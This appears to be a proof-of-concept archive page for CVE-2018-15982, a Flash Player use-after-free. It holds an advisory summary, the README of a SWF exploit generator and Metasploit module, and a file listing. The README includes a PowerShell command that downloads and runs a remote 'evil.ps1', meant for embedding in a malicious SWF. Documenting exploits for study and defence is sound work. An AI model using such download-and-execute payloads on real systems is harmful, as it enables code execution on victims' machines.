CVE-2018-15982 PoC — Adobe Flash Player Security Vulnerability

Source
Associated Vulnerability
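Title: Adobe Flash Player Security Vulnerability (CVE-2018-15982)
Description: Adobe Flash Player is a cross-platform, browser-based multimedia player product from the US company Adobe. The product supports viewing applications, content and video across screens and browsers. A use-after-free vulnerability exists in Adobe Flash Player. An attacker can exploit this vulnerability to execute arbitrary code. The following products and versions are affected: Adobe Flash Player Desktop Runtime 31.0.0.153 and earlier on Windows, macOS and Linux, and, on Windows, macOS, Linux and Chrome OS, Adobe Fl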
Description
Script and Metasploit module for CVE-2018-15982
Readme
# Adobe Flash CVE-2018-15982

This script creates a SWF payload for CVE-2018-15982. It is based on the PoC from https://github.com/smgorelik/Windows-RCE-exploits. The vulnerability was discovered by Chenming Xu and Ed Miles of Gigamon ATR.

The vulnerability is a use-after-free flaw enabling arbitrary code execution in Flash. More information can be found in the links below.

* https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

Note: Currently only spraying one block; I noticed this after I created the script.

Usage:

```
python create_swf.py <command> <output file name>
```

Example Usage:

```
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
```

Tested on: 
* Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
* Adobe Flash 31.0.0.153, 29.0.0.140


## Example


Create payload:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/create.png)


Executing payload:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/exec31.png)

Confirm execution:

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/confirm31.png)

## Metasploit Module

![alt text](https://github.com/kphongagsorn/adobe-flash/blob/master/images/metasploit-module.png)

File Snapshot

```
[4.0K] /data/pocs/a92e2479dd310d71ed76e903b95958393a375215
├── [ 46K] create_swf.py
├── [4.0K] images
│   ├── [3.8M] confirm31.png
│   ├── [289K] create.png
│   ├── [1.4M] exec31.png
│   └── [1.2M] metasploit-module.png
├── [4.0K] metasploit_module
│   └── [ 47K] adobe_flash_swf.rb
├── [1.4K] README.md
└── [4.0K] sample_files
    ├── [ 12K] calctest.swf
    ├── [ 12K] downloadtest.swf
    └── [ 12K] notepadtest.swf

3 directories, 10 files
```